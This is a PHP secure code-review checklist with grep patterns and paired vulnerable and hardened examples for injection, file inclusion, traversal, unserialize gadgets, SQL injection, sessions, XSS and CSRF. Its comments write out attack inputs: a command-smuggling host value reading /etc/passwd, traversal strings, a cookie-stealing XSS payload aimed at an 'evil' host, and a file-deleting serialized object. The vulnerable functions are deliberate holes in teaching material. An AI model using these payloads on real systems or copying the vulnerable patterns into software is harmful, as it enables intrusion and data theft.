- Command Injection, File Inclusion, Directory Traversal
Check use of:
- shell_exec
- exec
- backtick (`)
- system
- passthru, popen, proc_open (same class as exec)
- include
- include_once
- require
- require_once
- file_get_contents
- file_put_contents
- fopen
- preg_replace (the /e modifier evaluates the replacement as PHP code; deprecated in PHP 5.5, removed in 7.0)
- Find everywhere $_FILES and $HTTP_POST_FILES (legacy alias, removed in PHP 5.4) are referenced
- File extension filtering: with Apache AddHandler a name like shell.php.jpg is still executed as PHP, so check how the stored filename is built (http://blog.famillecollet.com/post/2013/01/13/PHP-and-Apache-SetHandler-vs-AddHandler)
find ./ -name "*php" -exec egrep -lE '(require|include)(_once)?(\s|\()+.*\$.*;$' {} \;
find ./ -name "*php" -exec egrep -lE 'file_get_contents(\s|\()+.*\$.*;$' {} \;
find ./ -name "*php" -exec egrep -lE 'file_put_contents(\s|\()+.*\$.*;$' {} \;
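Added example (not part of this checklist): each pattern the greps above flag, beside a hardened form. Function names, the pages/ and /var/www/uploads paths and the allowed extensions are assumed for illustration.

```php
<?php
// Added example, not from the checklist: vulnerable pattern vs hardened form
// for the functions the grep commands above look for. Paths and names assumed.

// --- Command injection (shell_exec / exec / system / backtick) -------------
function pingVulnerable(string $host): string {
    // $host straight from the request: "127.0.0.1; cat /etc/passwd"
    return (string) shell_exec("ping -c 1 " . $host);
}

function pingHardened(string $host): string {
    // Validate against a strict allow-list pattern, then still quote for the shell.
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host)) {
        throw new InvalidArgumentException('bad host');
    }
    return (string) shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// --- File inclusion (include / require) ------------------------------------
function pageVulnerable(string $page): void {
    // "../../../../etc/passwd" or, with allow_url_include=On, "http://evil/x"
    // is included; before PHP 5.3.4 a %00 also truncated the ".php" suffix.
    include 'pages/' . $page . '.php';
}

function pageHardened(string $page): void {
    // Allow-list: user input is only a key, never part of a path.
    $pages = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];
    if (!isset($pages[$page])) {
        http_response_code(404);
        return;
    }
    include $pages[$page];
}

// --- Directory traversal (file_get_contents / fopen) -----------------------
function readVulnerable(string $name) {
    return file_get_contents('/var/www/uploads/' . $name); // "../../etc/passwd"
}

function readHardened(string $name) {
    $base = realpath('/var/www/uploads');
    $path = realpath($base . '/' . $name);
    // realpath() resolves "..", symlinks and returns false for missing files;
    // the prefix check (with trailing separator) keeps the result inside $base.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return file_get_contents($path);
}

// --- Upload extension filtering ($_FILES) ----------------------------------
function uploadHardened(array $file, string $dir) {
    // $file is one entry of $_FILES. Only an allow-listed extension is kept and
    // the stored name is generated here, so "shell.php.jpg" becomes
    // "<random>.jpg" and no client-controlled name reaches the filesystem.
    // Store $dir outside the web root or with the PHP handler disabled there.
    $allowed = ['jpg', 'png', 'gif'];
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : false;
}
```

When reviewing, the question for each flagged call is whether the user-controlled part reaches the call as a key into an allow-list (safe), as validated-then-quoted data (acceptable), or as raw path/command text (finding).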
- Object injections
Check use of: serialize, unserialize
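Added example (not part of this checklist) of why a grep hit on unserialize() matters: any loadable class with a magic method becomes a gadget. The TempFile class, the cookie name and the key are assumed for illustration.

```php
<?php
// Added example, not from the checklist. TempFile stands in for any class in
// the autoload path whose __destruct/__wakeup does something with its fields.
class TempFile {
    public string $path = '';
    public function __destruct() {
        // Runs when the object is garbage collected, even if the code that
        // called unserialize() never touched the object.
        @unlink($this->path);
    }
}

function restoreVulnerable(string $cookie) {
    // Attacker sets the cookie to base64 of:
    // O:8:"TempFile":1:{s:4:"path";s:19:"/var/www/config.php";}
    // and the file is deleted when the request ends.
    return unserialize(base64_decode($cookie));
}

function restoreHardened(string $cookie, string $key) {
    // 1. Authenticate the blob so only data we produced is ever parsed.
    $raw = base64_decode($cookie, true);
    if ($raw === false || strlen($raw) <= 32) {
        return null;
    }
    $mac  = substr($raw, 0, 32);
    $data = substr($raw, 32);
    if (!hash_equals(hash_hmac('sha256', $data, $key, true), $mac)) {
        return null;
    }
    // 2. Even then, refuse objects: any O:... payload becomes
    //    __PHP_Incomplete_Class and no magic method runs (PHP >= 7.0).
    return unserialize($data, ['allowed_classes' => false]);
}

function storeHardened($value, string $key): string {
    $data = serialize($value);
    return base64_encode(hash_hmac('sha256', $data, $key, true) . $data);
}
```

For new code, json_encode()/json_decode() avoids the problem entirely; for existing code, check whether every unserialize() input is either never attacker-controlled or both authenticated and restricted with allowed_classes.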
- SQL Injections
???
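The checklist leaves this item blank; as an added example (not from the checklist), the string-built query a review should flag beside its prepared-statement form. The users table, columns and DSN are assumed.

```php
<?php
// Added example, not from the checklist. Table/column names and DSN assumed.

function findUserVulnerable(mysqli $db, string $name): ?array {
    // $name = "' OR '1'='1" returns every row; "' UNION SELECT ..." reads
    // other tables. Grep for query()/mysql_query() with "." or "$" inside the SQL.
    $res = $db->query("SELECT id, name FROM users WHERE name = '" . $name . "'");
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

function connect(): PDO {
    return new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares: the SQL text is parsed before any data
        // arrives, so the data can never change the statement's structure.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

function findUserHardened(PDO $db, string $name): ?array {
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Identifiers (table/column names, ORDER BY direction, LIMIT in some drivers)
// cannot be bound as parameters: allow-list them instead.
function listUsers(PDO $db, string $sortCol): array {
    $allowed = ['id', 'name', 'created'];
    if (!in_array($sortCol, $allowed, true)) {
        $sortCol = 'id';
    }
    $stmt = $db->query("SELECT id, name FROM users ORDER BY `$sortCol`");
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

A query built with prepare() is only safe if the user-controlled value is bound; a review should still read the SQL string of every prepare() call for concatenated fragments.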
- Session Hijacking/Session fixation
- Review login and logout pages: is session_regenerate_id() called on login (session fixation), and is the session destroyed and the cookie expired on logout?
- Is session.cookie_httponly set (and session.cookie_secure, session.use_strict_mode, session.use_only_cookies)?
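Added example (not part of this checklist) of what a correct login/logout pair looks like, so the review has a reference to compare against. Function names are assumed; the ini keys are PHP's own.

```php
<?php
// Added example, not from the checklist. Function names assumed.

function startSession(): void {
    // Cookie attributes must be set before session_start(). The array form
    // of session_set_cookie_params() and 'samesite' need PHP >= 7.3.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // session.cookie_secure: HTTPS only
        'httponly' => true,   // session.cookie_httponly: not readable by JS
        'samesite' => 'Lax',  // session.cookie_samesite: blunts CSRF
    ]);
    ini_set('session.use_strict_mode', '1');  // reject ids PHP did not issue
    ini_set('session.use_only_cookies', '1'); // never accept ?PHPSESSID=
    session_start();
}

function loginVulnerable(string $user): void {
    session_start();
    // Keeps whatever session id the attacker planted (fixation): after the
    // victim logs in, the attacker's known id is now authenticated.
    $_SESSION['user'] = $user;
}

function loginHardened(string $user): void {
    startSession();
    // Issue a fresh id whenever the privilege level changes and delete the
    // old session file (true) so the planted id is worthless.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
    $_SESSION['login_time'] = time();
}

function logoutHardened(): void {
    startSession();
    $_SESSION = [];
    // Expire the cookie in the browser as well as destroying server-side state.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 42000,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}
```

In a review, the two things to locate are a session_regenerate_id() call on every privilege change (login, role switch) and a logout that does more than unset($_SESSION['user']).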
- XSS, Reflected XSS, CSRF
Check use of: $_REQUEST, $_POST, $_GET, $_SERVER, $_COOKIE
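Added example (not part of this checklist): a reflected XSS and a CSRF-able form handler beside their fixes, covering the superglobals listed above. Parameter names and the csrf field name are assumed.

```php
<?php
// Added example, not from the checklist. Parameter names assumed.

// --- Reflected XSS ---------------------------------------------------------
function greetVulnerable(): string {
    // ?name=<script>location='http://evil/?'+document.cookie</script>
    return 'Hello ' . $_GET['name'];
}

function e(string $s): string {
    // HTML body / attribute context. ENT_QUOTES also escapes the single quote
    // so the value is safe inside single-quoted attributes; UTF-8 is explicit
    // so a wrong default charset cannot create alternate encodings.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function greetHardened(): string {
    $name = (string) ($_GET['name'] ?? '');
    return 'Hello ' . e($name);
}

function formActionHardened(): string {
    // $_SERVER['PHP_SELF'] and HTTP_HOST are attacker-influenced too:
    // /page.php/"><script>... ends up in action="" unless encoded.
    return '<form method="post" action="' . e($_SERVER['PHP_SELF']) . '">';
}

// --- CSRF: per-session random token, embedded in the form, checked on POST -
function csrfToken(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrfField(): string {
    return '<input type="hidden" name="csrf" value="' . e(csrfToken()) . '">';
}

function updateEmailVulnerable(): void {
    // Any site can submit this form (or even a GET link) on the victim's
    // behalf; $_REQUEST also merges GET and COOKIE per request_order, so a
    // check that only looks at $_POST is bypassed when the handler reads it.
    $email = $_REQUEST['email'];
    // ... save $email for the logged-in user
}

function csrfCheck(): void {
    $sent = (string) ($_POST['csrf'] ?? '');
    // hash_equals(): constant-time compare; a missing token also fails.
    if (empty($_SESSION['csrf']) || !hash_equals($_SESSION['csrf'], $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

function updateEmailHardened(): void {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        return;
    }
    csrfCheck();
    $email = filter_var($_POST['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        http_response_code(400);
        return;
    }
    // ... save $email for the logged-in user
}
```

For each superglobal read found, follow the value to its output sink (HTML, attribute, JavaScript, URL) and confirm the encoding matches that context; for each state-changing handler, confirm it accepts only POST and verifies a token tied to the session.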